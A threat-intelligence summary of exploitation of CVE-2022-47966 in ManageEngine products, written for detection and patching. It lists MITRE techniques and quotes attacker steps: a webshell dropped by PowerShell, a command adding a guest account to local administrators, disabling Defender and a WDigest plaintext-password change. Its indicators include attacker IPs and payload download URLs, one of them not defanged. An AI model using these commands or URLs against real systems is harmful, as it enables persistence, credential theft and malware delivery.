Rapid7 analyzes exploitation activity surrounding CVE-2022-47966, a pre-authentication RCE in ManageEngine on-premise products, noting public PoC code and ongoing compromises since January 2023. Organizations using affected products should patch and monitor for signs of intrusion as exploit activity has been observed in the wild. #CVE-2022-47966 #ManageEngine #ServiceDeskPlus #ADSelfServicePlus
Keypoints
- CVE-2022-47966 is a pre-authentication remote code execution vulnerability stemming from a vulnerable third-party dependency in Apache Santuario.
- Patches were released by ManageEngine/Zoho in Oct–Nov 2022, but exploitation was observed as early as Jan 17, 2023.
- Exploitation often begins with a malicious XML payload executing PowerShell to deploy a webshell and then enables persistent access via a renamed Plink tunnel.
- Post-exploitation activity includes creating a local administrator account and modifying the Wdigest registry key to store passwords in plaintext.
- Threat activity leverages PowerShell, Ingress Tool Transfer, protocol tunneling, and remote desktop-related actions to establish control and persistence.
- Rapid7 provides detections via InsightIDR, vulnerability checks via InsightVM/Nexpose, and a Velociraptor hunting artifact for these campaigns.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2022-47966 in ManageEngine products enabling pre-auth RCE. Quote: “exploitation across organizations as early as January 17, 2023 (UTC).”
- [T1059.001] PowerShell – Command and scripting interpreter used to execute payloads and download tools. Quote: “The payload in the malicious XML document executed a PowerShell command…”
- [T1505.003] Web Shell – Creation of a web shell by piping a Base64 payload into a web-accessible script and decoding it to a JSP page. Quote: “payload in the malicious XML document executed a PowerShell command that piped a Base64 encoded webshell into ../webapps/ROOT/scripts/ae_commons.js, where it was subsequently decoded into ../custom/login/commons.jsp.”
- [T1562.001] Defense Evasion – Disable or modify security tools (e.g., Defender realtime monitoring). Quote: “Defense Evasion: Disable Modify tools (Disable Defender realtime)”
- [T1105] Ingress Tool Transfer – Use PowerShell/Invoke-WebRequest to download additional remote-access tools. Quote: “Powershell cmdlet Invoke-WebRequest(IWR) used to download additional remote access tools”
- [T1572] Protocol Tunneling – Establishing tunneling for persistence and access (Plink/Chisel). Quote: “Protocol Tunneling: Chisel, Golang implementation of protocol tunneling tool – similar to Plink.”
- [T1136.001] Create Account – Create or modify local accounts to maintain access. Quote: “Create an account named guest to the local administrators group.”
- [T1555.003] Credentials in Registry – Modify WDigest to force plaintext password storage for credential harvesting. Quote: “modified the Wdigest registry key to force the system to store passwords in plaintext…”
- [T1021.001] Remote Services – Enable and use Remote Desktop/Remote Services for persistence and access. Quote: “net localgroup administrators guest /add … and enabling Remote Desktop”
- [T1496] Resource Hijacking – Miner installation (Monero) to abuse system resources. Quote: “Resource Hijacking: Coinminer installation (Monero)”
- [T1059.001] PowerShell – Reverse/shell-like command execution pattern observed in post-exploitation. Quote: “PowerShell (PowerShell reverse shell) …”
Indicators of Compromise
- [Network IOCs] Rapid7 aggregated network IOCs – 111.68.7[.]122, 50.19.48[.]59, and 7 more IOCs
- [File Names/Paths] Webshell artifacts and executables – ae_commons.js, ../custom/login/commons.jsp, and C:windowstempekern.exe
- [URLs] Download and command-and-control URLs – http://172.93.193.64/file.exe, http://111.68.7[.]122:8081/svhost.exe, and 1 more URL